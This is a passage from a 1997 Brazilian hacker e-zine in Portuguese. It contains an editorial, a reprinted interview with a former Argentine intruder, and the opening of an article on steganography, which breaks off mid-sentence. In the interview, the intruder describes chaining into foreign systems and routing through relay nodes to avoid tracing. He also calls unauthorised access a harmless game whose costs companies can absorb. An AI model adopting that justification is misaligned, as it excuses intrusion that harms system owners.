____ _ ______ _ _ _
| _ \ | | | ____| | | | (_)
| |_) | __ _ _ __ __ _| |_ __ _ | |__ | | ___| |_ _ __ _ ___ __ _
| _ < / _` | '__/ _` | __/ _` | | __| | |/ _ \ __| '__| |/ __/ _` |
| |_) | (_| | | | (_| | || (_| | | |____| | __/ |_| | | | (_| (_| |
|____/ \__,_|_| \__,_|\__\__,_| |______|_|\___|\__|_| |_|\___\__,_|
BARATA ELETRICA, numero 15
Sao Paulo, 21 de maio, 1997
---------------------------------------------------------------------------
Creditos:
--------
Este jornal foi escrito por Derneval R. R. da Cunha
(barataeletrica@thepentagon.com http://www.geocities.com/SiliconValley/5620
http://barata-eletrica.home.ml.org)
Com as devidas excecoes, toda a redacao e' minha. Esta' liberada a copia
(obvio) em formato eletronico, mas se trechos forem usados em outras
publicacoes, por favor incluam de onde tiraram e quem escreveu.
DISTRIBUICAO LIBERADA PARA TODOS, desde que mantido o copyright e a gratu-
idade. O E-zine e' gratis e nao pode ser vendido (senao vou querer minha
parte).
Para contatos (mas nao para receber o e-zine) escrevam para:
barataeletrica@ThePentagon.com <-- provavelmente minha conta definitiva
curupira@2600.com <-- minha mais nova conta
rodrigde@spider.usp.br
wu100@fim.uni-erlangen.de
Correio comum:
Caixa Postal 4502
CEP 01061-970
Sao Paulo - SP
BRAZIL
Numeros anteriores:
ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica
gopher://gopher.eff.org/11/Publications/CuD/Barata_Eletrica
http://www.eff.org/pub/Publications/CuD/Barata_Eletrica
ou ftp://etext.archive.umich.edu/pub/Zines/BerataElectrica
gopher://gopher.etext.org/00/Zines/BerataElectrica
(contem ate' o numero 8 e e' assim mesmo que se escreve, erro deles)
ATENCAO - ATENCAO - ATENCAO
Web Page do Fanzine Barata Eletrica:
http://www.geocities.com/SiliconValley/5620
http://barata-eletrica.home.ml.org
Contem arquivos interessantes.
ATENCAO - ATENCAO - ATENCAO
NO BRASIL:
http://www.inf.ufsc.br/ufsc/cultura/barata.html
http://www.di.ufpe.br/~wjqs
http://www.telecom.uff.br/~buick/fim.html
http://tubarao.lsee.fee.unicamp.br/personal/barata.html
ftp://ftp.ufba.br/pub/barata_eletrica
(Normalmente, sao os primeiros a receber o zine)
MIRRORS - da Electronic Frontier Foundation onde se pode achar o BE
/pub/Publications/CuD.
UNITED STATES:
etext.archive.umich.edu in /pub/CuD/Barata_Eletrica
ftp.eff.org in /pub/Publications/CuD/Barata_Eletrica
aql.gatech.edu in /pub/eff/cud/Barata_Eletrica
world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica
uceng.uc.edu in /pub/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica
wuarchive.wustl.edu in /doc/EFF/Publications/CuD/Barata_Eletrica
EUROPE:
nic.funet.fi in /pub/doc/cud/Barata_Eletrica
(Finland)
(or /mirror/ftp.eff.org/pub/Publications/CuD/Barata_Eletrica)
ftp.warwick.ac.uk in /pub/cud/Barata_Eletrica (United Kingdom)
JAPAN:
ftp.glocom.ac.jp in /mirror/ftp.eff.org/Publications/CuD/Barata_Eletrica
www.rcac.tdi.co.jp in /pub/mirror/CuD/Barata_Eletrica
OBS: Para quem nao esta' acostumado com arquivos de extensao .gz:
Na hora de fazer o ftp, digite binary + enter, depois digite
o nome do arquivo sem a extensao .gz
Existe um descompactador no ftp.unicamp.br, oak.oakland.edu ou em
qualquer mirror da Simtel, no subdiretorio:
/SimTel/msdos/compress/gzip124.zip to expand it before you can use it.
Uma vez descompactado o arquivo GZIP.EXE, a sintaxe seria:
"A>gzip -d arquivo.gz
No caso, voce teria que trazer os arquivos be.??.gz para o
ambiente DOS com o nome alterado para algo parecido com be??.gz,
para isso funcionar.
==========================================================================
ULTIMO RECURSO, para quem nao conseguir acessar a Internet de forma direta,
mande carta (nao exagere, o pessoal e' gente fina, mas nao e' escravo, nao
esquecam aqueles encantamentos como "please" , "por favor" e "obrigado"):
fb2net@netville.com.br hoffmeister@conex.com.br
drren@conex.com.br wjqs@di.ufpe.br
aessilva@carpa.ciagri.usp.br dms@embratel.net.br
clevers@music.pucrs.br rgurgel@eabdf.br
patrick@summer.com.br
#########################################################################
ASSINATURA DO BARATA ELETRICA VIA CORREIO ELETRONICO
Para receber o fanzine via email, mesmo quando podendo pegar ele na rede.
Estou montando um esquema no qual a pessoa envia email para:
rato.cpd@digicron.com
com os seguintes dizeres, no corpo da carta:
assinatura BE seu-email@fulano.xxxx.xx
entendendo claro que seu email e' seu e-mail, nao a string seu-email. Isso
porque nao vou ler a correspondencia. Qualquer coisa alem disso sera'
ignorada.
Como mesmo assim vou precisar de gente para me ajudar a distribuir, as
pessoas que tiverem boa vontade tambem podem participar, enviando email
para o mesmo endereco eletronico com o subject:
ajuda BE seu-email@fulano.xxx.xx
Provavelmente nao havera' resposta, ja' que e' um acochambramento que
to planejando. A cada novo numero, vou sortear os voluntarios que irao
receber primeiro e depois vao distribuir para os preguicosos ou distrai-
dos ou super-ocupados que querem receber o lance sem fazer ftp ou usar
WWW. Mas aviso: sera' feita a distribuicao em formato uuencodado.
Aprendam a usar o uudecode. E nao ha' garantia que a coisa vai funcionar.
A assinatura comeca a partir do numero seguinte.
OBSERVACAO: Tem muita gente que esta' enviando carta so' com assinatura
no conteudo e mais nada. As pessoas que nao seguirem as instrucoes acima
a risca perigam nao receber. Agradeco ao enorme numero de voluntarios p.
distribuicao.
########################################################################
CREDITOS II :
Sem palavras para agradecer ao pessoal que se ofereceu para ajudar na
distribuicao do E-zine, como os voluntarios acima citados, e outros,
como o sluz@ufba.br (Sergio do ftp.ufba.br), e o delucca do www.inf.ufsc.br
Igualmente para todos os que me fazem o favor de ajudar a divulgar o Barata
em todas as BBSes pelo Brasil afora.
AGRADECO TAMBEM AOS QUE QUEREM ME AJUDAR, "HOSPEDANDO" O EZINE EM SUAS
PAGINAS OU FTP-SITES. A PARTIR DO PROXIMO BE, COMECO A COLOCAR OS URLS
DESDE QUE NAO HAJA UM LANCE COMERCIAL (nao quero meu fanzine com propaganda
de qualquer especie, nem do provedor)
OBSERVACAO: Alguns mails colocados eu coloquei sem o username (praticamente
a maioria) por levar em conta que nem todo mundo quer passar por
colaborador do BE. Aqueles que quiserem assumir a carta, mandem um mail
para mim e numa proxima edicao eu coloco.
###########################################################################
INTRODUCAO
==========
Como de costume, explicar um pouco porque esse intervalo de tempo entre uma
edicao e outra... terminei a ultima edicao e fui para a Argentina, via RGS,
rapidinho. Estava afins de encontrar a mesma mocada e tambem aproveitar um
pouco o as parcas ferias que minha bolsa de aperfeicoamento me dava. Uma
merda. Uma porque nao consegui chegar la' antes do ano novo. Duas porque
cheguei la' com poucos dolares, fui no Banco de Boston sacar com um VISA-
Ourocard do Banco do Brasil que tive um p(*) dum trabalho pra conseguir.
Sabe o que rolou? Nao me sacaram nenhuma grana e ainda por cima me falaram
que o limite de saque do cartao tava esgotado. E isso com o guardinha do
lado, pronto pro escandalo, numa sexta-feira. E eu que tinha uma boa imagem
da Argentina, diminuiu um pouco. Puxa so' arrumei o cartao pra usar em
viagem...nao tinha usado nem na Internet. Fazer o que? Mudar de cartao e
levar mais cash, na proxima.
Encontrei o Bomsembiante, que NAO ficou rico com a historia de fazer a
"Virus Report". Pelo contrario, disse que quando leu meu artigo na 2600 -
Hacker Quaterly (mais ou menos aquilo q ta' na minha pagina na geocities)
teve inveja da minha ideia de nao publicar em papel. A grafica obrigava a
imprimir o minimo de 10.000 numeros vender bem menos do que isso. Nao ficou
mal, mas parou com a publicacao. Prometeu me mandar recortes da cena hacker
na Argentina incluindo os news clips da Convencao de Hackers de outubro de
94. Como ta' demorando um pouco, se alguem puder me ajudar com isso,
agradeco.
Durante o inicio do ano descobri que tao surgindo novos zines. E ate'
que chamo "ruptura". Alguns caras decidiram que o que eu escrevo nao e'
bom, pra dizer o minimo... acho saudavel. Todo mundo tem direito a
liberdade de opiniao e expressao. Nao importa se o cara e' "ista" de
qualquer tipo. Todos tem esse direito. Pouco saudavel, o cara que enviou
bomba de email pra esquina das listas.. nao respeitou essa liberdade. E
botou meu nome no meio. Otimo. So' acho q se algum "araponga" comecasse 1a
lista de possiveis e futuros "vandalos da rede" iria ficar na moita so'
anotando os emails de quem fala mal do BE. Nao e' muita gente. Vigiar todo
mundo que le^, por outro lado, e' mais complicado. Sempre achei que estava
"desbravando" o caminho pra muita gente. Sim porque demorou e como demorou
a aparecer outro e-zine, depois do meu. Qualquer pessoa com pouco talento,
pode e deve ser capaz de escrever algo melhor. Talvez nao com tanta
penetracao e publico. De resto, fico so' pensando naquele ditado: "a inveja
e' a arma do incompetente". Tem cara q. nao sabe disso e fica escrevendo
umas cartas do tipo: "tu nao e' de nada, eu sou melhor". E dai'? Qualquer
cara de 16 anos tem condicao de se tornar muito melhor do que eu.
Simplesmente porque tem mais tempo pela frente. Talvez nem tenha problemas
de emprego. Eu, eu tenho um nome a zelar, contas pra pagar, etc..
Fico chateado, mas nao muito. Quando comecei o fanzine, tinha que
explicar tudo, ate' como usar PGP. Agora nao. Ja' tem uma atmosfera
favorecendo ate' gente que contribua para coisas com a quais nao quero
mexer. Afinal de contas, queima o filme falar "como fazer uma bomba
caseira". Mesmo que um cara que fez isso aqui em Sampa tenha aprendido isso
no cinema. Estou editando o Barata pensando no fato de que se a pessoa
quiser, pode perfeitamente procurar sozinha suas proprias receitas...
Prefiro que a pessoa aprenda a "pescar" na rede, ao inves de dar o peixe na
mao. E.. Antes reputacao de burro do que de demente ou vandalo.
A razao da demora do numero foi que arrumei um lance montando um
servidor internet. Ja' to por dentro de trocentas manhas que antes nao
tinha. E como sou ignorante, meu Deus! A gente so' descobre fazendo as
coisas. Consome um pouco de tempo aprender a botar algo na rede. Depois
piora. Ruim mesmo e' que to com indefinicao de moradia tambem. Mas tudo
bem. Pelo menos o diploma ta' encaminhado. Meu proximo desafio e' achar um
patrocinador pra ir nos encontros de Hackers que vao rolar la' fora. E
terminar de escrever meu livro sobre hackers. A vida e dura...
Nota: teve uma reporter de uma revista cujo nome nao vou falar que
escreveu um artigo sobre um "hacker" contando a vida dele... o^ coisa ruim.
Mais uma vez a imprensa quer mesmo e' retratar vandalismo. So' a escolha de
palavras: "prisioneiros", "vinganca", etc quase ignora que existe etica
hacker. Legal porque tem alguns elementos tipicos de alguns hackers: se
gabar pra caramba de coisas que normalmente uma pessoa nao faria. Em grupo,
sim. Um poderia colecionar senhas de trocentos provedores. Outro poderia
colecionar esquemas de "vinganca". E ai' por diante. Nao sao coisas
mutuamente excludentes, mas a materia parecia coisa demais pra um cara so'
fazer. De qualquer forma o perigo sao os idiotas que vao tentar imitar a
revista, achando que aquilo e' um "hacker". Vao e' detonar para todos os
outros que nao pensam em ser vandalos.
INTRODUCAO
CAVALEIROS DA REDE - Reportagem com um hacker
ESTEGANOGRAFIA - A ARTE DE ESCONDER INFORMACAO
HISTORIA RESUMIDA DO BARATA ELETRICA
PARA SUA PROTECAO: O GRANDE IRMAO ESTA' VINDO
UMA SEMANA NA VIDA DO ADMINISTRADOR DE SUPORTE DO INFERNO
ULTIMAS NOTICIAS DO MITNICK
ALGUNS ENCONTROS DE HACKERS NO MUNDO TODO
DEMO CODING: ARTE, HACKING OU OQUE?
NEWS - PIADAS - BUGS - LINUX - DICAS - ETC..
BIBLIOGRAFIA
----------------------------------
CAVALEIROS DA REDE - Reportagem com um hacker
=============================================
A revista argentina "Virus Report" entrevistou um dos primeiros hackers do
pais, cujo nome verdadeiro se mantem segredo por motivos obvios. Seu nome de
guerra e' "Chacal". O que se segue e' a transcricao da conversa que foi
mantida com ele. (Esta reportagem foi publicada com permissao do editor da
revista, Fernando Bomsembiante)
VirusReport - Qual sua idade e a que se dedica agora?
Chacal - Naturalmente, esta informacao nao se pode dizer abertamente. A
idade... beirando os trinta. Ocupacao atual... tenho uma empresa de
consultoria na area de informatica, vinculada com o setor de comunicacoes e
redes. E quando era mais jovem me dedicava a hackear: acredito que este e' o
objetivo desta entrevista.
VR - Mais ou menos em que ano e que idade terias?
CH - O pico da atividade foi no ano de 87. Nessa epoca tinha 20 e poucos..
era outra etapa da vida na qual tinha mais tempo para dedicar a este tipo de
coisa.
VR - E porque deixou de faze-lo?
CH - Por um lado, porque e' uma atividade que leva muito tempo. Por outro
lado, porque de alguma maneira pude reestruturar todos os conhecimentos que
adquiri nessa etapa de hacking. Capitalizei-os para dedicar-los a atividade
produtiva e nao ao hacking, que e' algo de hobby, uma diversao.
VR - Para voce, o que e' ser hacker?
CH - Muito se disse sobre o que e' ser um hacker. O conceito popular de
hacker diz que e' uma pessoa que acessa outros computadores de forma nao
ortodoxa, beirando a ilegalidade, depende de como o considera. O personagem
popularizado por peliculas como "Jogos de Guerra", que utilizando os
computadores e redes telefonicas para entrar no Pentagono, na Nasa .. na
realidade se pode acessar diferentes tipos de lugares; claro que todos
querem chegar ao pentagono ou a NASA mas tambem tem centros de informacao,
empresas, companhias, museus, universidades..
VR - Que tipo de coisas fazia nos seus anos dourados?
CH - A atividade do hacker e' investigar onde se pode entrar, como entrar,
como violar a seguranca dos mecanismos de acesso as comunicacoes, as
universidades, as empresas ou centro governamentais no exterior. Uma vez que
se esta' ali e' mais uma atividade de voyer, um jogo de xadrez contra a
seguranca do lugar onde se pretende violar. E' entrar, ver e mais nada. A
intencao do hacker, pelo menos do hacker inteligente, nao e' destruir
informacao, isso e' um pouco infantil. Acessar um sistema para destruir
informacao de gente inocente que nao participam no jogo nao tem graca
nenhuma.
VR - Mas existe gente que quer entrar nos BBS para apagar seus discos...
CH - Isto seria como ir ate' a porta de um colegio e roubar doce de crianca.
Nao tem sentido. Hackear uma BBS e' uma estupidez. Isto e' um servico que
uma pessoa ou instituicao da' para que outros possam comunicar-se. Hackea-la
e destrui-la? Nao, e' ridiculo. Cada um busca o desafio de acordo com sua
capacidade, o que hackea uma bbs sabe que isso e' o seu limite. O verdadeiro
hacker, ou pelo menos o que tem um pouco de capacidade intelectual, pretende
acessar alguma universidade no estrangeiro, ou um centro europeu de
investigacoes nucleares ou uma companhia mineira na Africa do Sul. Cada qual
sabe quais sao as metas que se planeja. O objetivo nunca e' destruir, porque
o hacker quer essencialmente passar despercebido. E' uma satisfacao
intelectual. Eu sei que pude entrar num sistema, pronto. Ao final se
compartilha com um circulo de iniciados. Tem essa caracteristica um pouco
"mistica".
VR- E' muito lindo este teu discurso de pacifismo, mas ha' contas de
telefone enorme pagas por algum outro, chamadas ao exterior, acessos ilegais
e uso de bancos de dados no estrangeiro.. tudo isto custa dinheiro e e'
evidente que voces nao pagam.
CH- Poderiamos considera quase como uma travessura. O uso que um hacker pode
fazer de um sistema no estrangeiro, de um ponto de vista legal, e' uma
contravencao. Na realidade, e' um uso de tempo de computador que nao
representa um custo importante para as empresas que prestam o servico e que
se feito com moderacao nao passa de ser uma transgressao. E' parte dos
custos que a empresa pode assumir, insisto, quando feito moderadamente e de
forma adequada. Pois aquele que entra num sistema e o utiliza para conseguir
informacao tecnica, ou para comunicar-se com gente com a qual faz
intercambio de informacoes nao esta' criando prejuizo significativo. Um
supermercado assume que vai ter um custo porque uma senhora passou com um
menino e quebrou uma garrafa; sao custos que se assumem. Ja' esta' calculado
e nao representa um problema importante. Nos casos de empresas as quais
assessoro e pudem chegar a bancar este tipo de servico, se calcula o custo
de infiltracoes ou de um abuso do sistema.
VR- Agora tens uma posicao bastante dentro da lei. Ha' alguns anos, quando
eras hacker, pensava do mesmo jeito ou era um pouco mais anarquista?
CH- Provavelmente era um pouco mais anarquista. Igualmente, de qualquer
jeito, hoje estou a favor do livre fluxo da informacao. Creio que e'
importante acessar a informacao, que os computadores e as comunicacoes
entre computadores permitam, como dizia Marshall Mac Luhan, uma "aldeia
global" (Global Village, nao rede globo - nota do editor).
Insisto sempre: mesmo quando me dedicava a hackear, fazia isso com
criterio, com uma especie de sentido de dever. Era um pouco romantico o que
faziamos nessa epoca, um desafio com certas regras de jogo limpo. Eramos
cavaleiros das redes de computadores. O mesmo talvez se sucede em qualquer
atividade: quando isso se massifica, comeca a haver todo tipo de pessoas,
boas e ma's, e se perde muitas vezes o sentido original. A pessoa que ha'
um mes atras nao sabia nada de computadores e sem muito custo conseguiu
acessar uma informacao tecnica e de repente pode meter-se em uma rede em
qualquer lugar do mundo nao tem uma consciencia bem formada. O que posso
recomendar a qualquer um que se interesse por este tipo de atividades
transgressoras e' que a desfrute, que investigue e que va fazendo as coisas
por sua conta, de modo sao e com boa fe', que e' realmente divertido. E'
como jogar xadrez fazendo trapaca, nao tem nenhuma graca. A verdadeira
graca esta' em jogar respeitando as regras do jogo. Isto funciona igual, as
regras do jogo sao: quebrar a cabeca para conseguir a informacao,
conseguir acessar e atuar cavalheirescamente, igual a um bom jogador de
xadrez.
VR - Penso que uma pessoa nao diz "vou ser um hacker" e no outro dia comeca
a entrar nos bancos de dados no exterior. Como foi teu inicio no tema?
CH - Nos velhos tempos, as coisas eram muito mais complicadas do que hoje.
Na epoca da qual estamos falando havia muito poucos modens e muita pouca
informacao. Era tudo um trabalho de folego. Tinha que se comecar do zero,
investigando e descobrindo, comprando revistas estrangeiras para interar-se
donde havia sistemas disponiveis, ler muitissimo, e de pouco em pouco,
podia se interar de onde era possivel acessar. Ai se buscavam as formas de
chegar... muitas vezes se paga parte da comunicacao e se acessa pelo outro
lado por diferentes partes da mesma coisa. No fim, hoje esta' muito mais
vulgarizado e ha' um montao de pseudo-hackers que obteem informacao de um
amigo que sabe um pouco mais, passa adiante uma serie de arquivos
completos, entram, nao sabem como, nao sabem o que fazem, o que e' o tipo
de coisa que nao tem graca. Os usuarios sao muito pouco conscientes da
possibilidade de que outra pessoa descubra suas chaves. Investigando um
pouco, testando, com muitas horas, com muito tempo, muito trabalho, vai se
chegando. Na medida que um acessava algo no estrangeiro, comecava a entrar
em "redes" de hackers onde se intercambiava informacao. Um descobria um
computador na Tanzania de uma empresa em processo de instalacao e troca
essa informacao por um acesso a uma companhia no Japao, e ai' entao
consegue informacao porque esse computador no Japao se comunica com outro
na Alemanha; entao, sabendo muito de sistemas, se busca arquivos que deem
uma pista de como se esta' comunicando (atraves desse computador) e se
tenta usar os mesmos mecanismos. Entao se entra nesse computador da
Alemanha fazendo-se passar pelo computador do Japao e assim se vai armando
uma corrente na qual se vai encontrando coisas as quais se pode acessar.
VR - Penso que sua posicao economica atual, bastante boa, se deve ao fato
de ter se tornado hacker em algum momento da vida?
CH - Indiretamente sim, porque a atividade de hacking me permitiu adquirir
uma serie de conhecimentos...
VR - Nao me refiro por isto que tenha tido a experiencia de roubar um
banco...
CH - Nao, nao, por suposicao, isto nao. Adquiri muitos conhecimentos, que
depois fui capaz de usar. Hoje em dia, pude desenvolver tecnicas de
seguranca baseadas nos meus conhecimentos de como acessar outros sistemas.
Esse conhecimento interno da coisa me permite desenvolver sistemas que sao
-entre aspas- infaliveis. Sempre entre aspas porque na realidade nao existe
sistema de seguranca perfeito. De certo modo e' o mesmo que perguntar quem
e' o melhor especialista em seguranca de caixas fortes: so' pode ser o
ladrao de cofres. Esse e' que mais vai saber como fazer uma caixa
inviolavel. E' algo parecido. Esses conhecimentos depois podem ser
aplicados para fazer o contrario. Nao deixa de ser parte deste jogo de
xadrez, nada mais do que no principio se joga de um lado do tabuleiro e
depois se troca de lado. Antes o jogo era violar sistemas e agora e' criar
sistemas seguros e oferecer este servico as empresas.
VR - Quais outros hackers voce conheceu?
CH - Aqui na Argentina havia um grupo de hackers de importancia media. Me
recordo do famoso Dr. Trucho, a Nibbier, gente que fazia..
VR - Voce pertencia a este grupo?
CH - Sim, digamos que intercambiavamos informacao, ou encaravamos projetos
juntos. Inclusive o famoso "PUA", Piratas Unidos Argentinos, que surgiu
como uma mancha no inicio e tomou certa envergadura depois. Os hackers
argentinos que havia neste momento eram hackers conscientes, e essa
consciencia surgiu de ter trabalhado desesperadamente. Nao havia amigos ou
fadas madrinhas que nos brindassem com arquivos cheios de informacao. No
exterior, por exemplo, conheci muitos hackers importantes: alemaes (entre
os quais se contavam o pessoal do Chaos Computer Club), ingleses,
italianos, australianos e, obviamente, americanos. Nesse momento existiam
diferentes lugares onde os hackers trocavam informacao, pontos de reuniao
ou grandes bancos de dados somente conhecidos por hackers de certo nivel
para cima e uma lenda para os outros que tentavam acessa-los. Eram lugares
secretos que uns diziam que existiam, que tinham um amigo que alguma vez os
tinha visto e outros diziam que nao, que na realidade eram miragem. Alguns
eram fantasia e outros realidade.
VR - Esses lugares eram maquinas, bancos de dados?
CH - Sim, computadores escondidos nas redes mundiais de comunicacao, com
acessos que nao estavam nos guias telefonicos de computadores do mundo...
VR - E ai' se intercambiava informacao...
CH - Desse jeito, ali podia se encontrar desde os codigos para se
movimentar os satelites dos EUA, deixados por gente do Chaos Computer Club
ate' como se infiltrar nas comunicacoes telefonicas da Australia ou os
codigos de acesso a uma companhia mineradora sul-africana. Tambem havia
informacao tecnica vinculada com as comunicacoes, com os modens, que podiam
ser utilizadas nao somente para hacking, senao para atividades legais.
VR - Pode me dizer alguns nomes destes lugares onde se encontravam?
CH - Um famoso era Altos, um lugar na Alemanha que ninguem conhecia e todos
mencionavam. Outro lugar era AMP, Adventure Multi Player, um jogo de
aventuras multiusuario na Inglaterra que alem de ser um jogo de aventuras
era um lugar de intercambio de informacao.
VR - Tens alguma anedota que pode contar de seus dias de hacker, algo
divertido?
CH - Sim, havia coisas divertidas... por exemplo, para evitar o
rastreamento era comum entrar com algo que era chamado de PAD,
computadores que permitem a entrada e gerar nova comunicacao com outro
lugar. Os hackers mais paranoicos usavam 4 ou 5 PADs para fazer suas
comunicacoes. Como anedotas locais, havia naquele tempo na Argentina um
servico de informacoes com o qual tinhamos uma disputa, coisa de crianca.
Nos acessavamos seu sistema e pediamos que reconhecessem nossa existencia
abrindo uma conta em nome de "Grupo Piratas Unidos Argentinos" (nota do
editor: do meu ponto de vista, algo idiota e facil d ser rastreado). Ha
anedotas com o pessoal do "Chaos Computer Club" de Hamburgo, que se meteram
nos computadores dos EUA e, quando se deram conta de que haviam sido
rastreados, decidiram sacar uma especie de seguro de vida ante o risco que
fossem desaparecer ou terminar com "perdas extremas", como e' o eufemismo
que a CIA usa nestes casos. Algum tempo depois, alguns deles tiveram
acidentes inexplicaveis... muitas anedotas nao podem ser contadas porque
envolvem conhecimentos que nao sao para difundir.
VR - Alguma vez voce teve algum problema deste nivel ou ameacas?
CH - Nao, a nivel de ameacas nao, mas situacos engracadas. As vezes a
atividade hacker, mesmo inocente pode atrapalhar negociacos complicadas
entre empresas ou pode provocar outros tipos de incovenientes, onde muitas
vezes o mesmo hacker nao sabe o que e' que se passa, problemas empresariais
vinculados com custos de comunicacoes e coisas assim. Isso e' saudavel de
certo modo. Levando a um plano idealista, o hacker bem intencionado e' uma
especie de Robin Hood da informacao, que permite que todo mundo acesse a
ela, coisa que de outra forma permaneceria oculta.
ESTEGANOGRAFIA - A ARTE DE ESCONDER INFORMACAO
==============================================
E' a parte da criptografia que lida com (basicamente) o ocultamento da
mensagem. Compreende tambem metodos alternativos de transmissao e uma serie
de outras sub-ciencias que nao vou detalhar aqui, por absoluta falta de
tempo. E' talvez um dos ramos da criptografia que tem a maior aplicacao no
dia-a-dia. Como diversao, pode ser encontrado na secao de caca-palavra de
qualquer jornal ou revista. E' usada no ocultamento de marcas de copyright
(aquela foto que voce fez download, mas bem miudinho conserva o URL pra
direitos autorais). Etc, etc.. Pode-se tracar a estenografia na historia
desde a antiguidade, quando 1 grego tatuou a mensagem na cabeca raspada de
1 escravo. Quando o cabelo cresceu, este foi enviado atraves das linhas
inimigas sem levantar suspeitas. Tudo bem q teve a cabeca raspada de novo,
depois, para o destinatario ler a mensagem...
A diferenca basica entre a criptografia e a estenografia e' simples:
com a criptografia, se eu recebo uma mensagem que fulano me pede para
entregar a ciclano, imediatamente fico consciente de que:
1) Fulano e ciclano tem seus segredinhos
2) Fulano e ciclano tem um codigo secreto p. se comunicar
3) Fulano e ciclano nao confiam em mim para determinados assuntos
4) " e " podem estar com algo em andamento, coisa q nao posso
saber..
Mesmo que a mensagem nao seja nada disso, afinal de contas todo mundo tem
direito a um pouco de privacidade (e tem mesmo, ta' na constituicao), o
fato e' que o uso de mensagem secreta num canal aberto pode ser suspeito.
Inclusive um amigo me relatou que pode ser usado como prova num tribunal de
algo conhecido como "formacao de quadrilha". Pode dar cana, se houver algo
como serio (exemplo: consumo de substancia alteradora do funcionamento
cerebral, vulgo entorpecente ou "bagulho", etc, consulte seu advogado).
Voltando ao ponto inicial, o uso de criptografia evidencia comunicacao
privada e secreta. Mas o uso de estenografia nao, porque a primeira vista
nao existe a mensagem secreta. Ela esta' invisivel aos olhos de um nao-
iniciado. O conteudo da mensagem tem um sentido claro para o publico e um
oculto para um grupo restrito. Leiam os textos abaixo.
Subject:[PIADAS-L]
Carta de um soldado a sua noiva.
Nao imagina, meu amor como estamos ca-
minhando alegres, apesar de estarmos esma-
gados nesta luta, estamos indo mesmo a mer-
ce^ de Deus; nao precisa ficar contraria-
da, minha querida, pois nao ha priva-
coes, que logo termina a situacao marca-
da para tanta gente, todos querem ca-
minhar a frente, varios noivos estao a nave-
gar ao mesmo tempo, eh uma lastima, ca-
bos, sargentos, na flor da idade esma-
gados por toda parte, ha sem duvidas fe-
ridos que gemem; moribundos provocan-
do, invadindo lares, estamos atras de peni-
tenciarias, pedindo ajuda a pobres e ri-
cos de todo o mundo.
Abracos de seu noivo que mi-
mosamente olha e bei-
ja a todo instante no seu retrato.
(leia de novo o texto, linha sim, linha nao)
Subject: [PIADAS-L] Anuncio
Neste estabelecimento moderno e de luxo, encontra-se pu-
blicamente em exposicao as mais lindas e confortaveis bo-
tas baixas, altas e apertadas, por preco de ocasiao. Sa-
patos de verniz, camurca, ultimos modelos. Piteiras ameri-
canas, bonitas e elegantes, finas e especialmente para fu-
mar em saloes, bares e cafes elegantes. Estamos a ven-
der desde R$ 1,00. Nossa especialidade =82 exclusiva em cu-
ecas, camisetas, lencos e blusoes.
De mocinhas a rapazes de 14 anos, a partir de R$ 0,50. Pu-
xadores, travessas nacionais e estrangeiras. Jogos de mon-
taria completa, para diversos precos. Temos lindos ca-
nivetes, artigos de papelaria, canetas cartinagens, ba-
ralhos de diversos tipos e tamanhos, bem como umas bo-
necas de veludo e pele de raposa. Fios, trancas e tran-
cetas especiais, chegadas diretamente de Paris.
Se voce chegou ao final desse anuncio e nao se interessou
por nenhum artigo, releia-o pulando uma linha.
Agora para de rir e presta atencao.
A mensagem tem um duplo sentido e duas informacoes diferentes. Uma e' a
obvia, que nao precisa necessariamente ser verdadeira, basta fazer sentido.
E a outra mensagem que poderia, num caso ficticio, ser ate' verdadeira, um
soldado servindo no front, com problemas ... esquece.
E' uma coisa que as vezes provoca um pouco de paranoia, em tempos de
censura. Porque uma mensagem simples, tipo "vou hoje" e' uma coisa. Agora
dentro de determinados contextos, significam coisas completamente
diferentes. "Vou hoje", vindo de um doente terminal pode significar algo
completamente diferente do "vou hoje" de um cara num escritorio de suporte
de micros. Tudo depende do contexto. Entao, aqueles com mais idade vao se
lembrar daquela musiquinha de natal da TV:
"Quero ver, voce nao chorar, nao olhar p. tras, nem se arrepender
do que faz...
Quero ver o amor vencer, mas se a dor nascer, voce resistir e
sorrir ..."
E tem gente ate' hoje que quando se lembra, canta com saudade. Pergunte a
qualquer um entre 20 e 50 anos q. assistia tv nos anos 70 e 80. Mo' ibope.
Porque nao passa mais propaganda com ela? Bom, teve alguem q.chamou essa
musica de "Melo^ do sexo anal". Pronto. Vai saber se o cara pensou nisso
quando fez a musica. Mas se encaixou direitinho num outro contexto. Alias o
grande merito de obras artisticas ( e ja' nao estou mais falando da
musiquinha) e' exatamente ter essa segunda mensagem escondida.
"Julinho da Adelaide" a.k.a. (Also Know As - Tambem Conhecido Como)
Chico Buarque, fez uma musica cujo refrao era "voce nao gosta de mim, mas
sua filha gosta". O pessoal levou p. outro contexto, ate' q. lembraram q. a
filha do (ex) Presid. Geisel havia dito numa reportagem que gostava das mu-
-sicas do Chico Buarque, exemplo d mais censurados pela ditadura. A musica
popular brasileira ta' cheia de exemplos desse tipo, onde muda a entonacao,
muda o contexto e a verdadeira mensagem aparece.
Dizem, nao sei se e' verdade, que um disco do Milton Nascimento, no
tempo da Ditadura, escondia um grito clamando "Lamarca" (deputado morto
durante a repressao). Pra escutar, era necessario tocar o LP ao contrario.
O grupo "Lingua de Trapo" teria feito algo semelhante: pos uma mensagem
"voce esta' estragando seu disco" quando se tocava ao contrario.
Outros tipos de estenografia: a historia de um grupo de surfista de
um "point" no litoral norte paulista (ou qualquer outro, esqueci de onde li
isso). A turma nao aguentava mais a invasao de surfista de "escritorio"
tentando se enturmar. Entao mudavam a giria toda semana. Desse jeito sabiam
quem era da area ou tava so' fingindo.
Sobre formas alternativas de transmissao de mensagem, ha' milhares. E'
o que se chama de "transmissao de dados por canais de baixa seguranca".
Tipo comunicacao entre habitantes de prisoes, internatos, esses lances.
Uma das historias mais interessantes e' de um cara que ficou preso na Ilha
Grande por conta da ditadura do Getulio Vargas. Os prisioneiros nao ficavam
em celas superlotadas como hoje, acredito. Como sempre acontece, o pessoal
bolou um sistema interno p. se comunicar. Usando baratas. Por incrivel que
pareca. Como se trata de um inseto com o olfato altamente desenvolvido,
"sentia" o caminho ate' um pedaco de biscoito com facilidade. Era amarrado
a uma linha de papagaio e pronto. Quando chegava ao local, o receptor da
"barata" puxava o fio com a mensagem. Nem os proprios prisioneiros
acreditavam que um bicho tao nojento podia ser adestrado e demonstrar
inteligencia, mas a coisa funcionava.
So' pra se ter uma ideia do alcance das mil e uma formas que uma
mensagem pode ser ocultada, os EUA na 2a Guerra tinham um verdadeiro
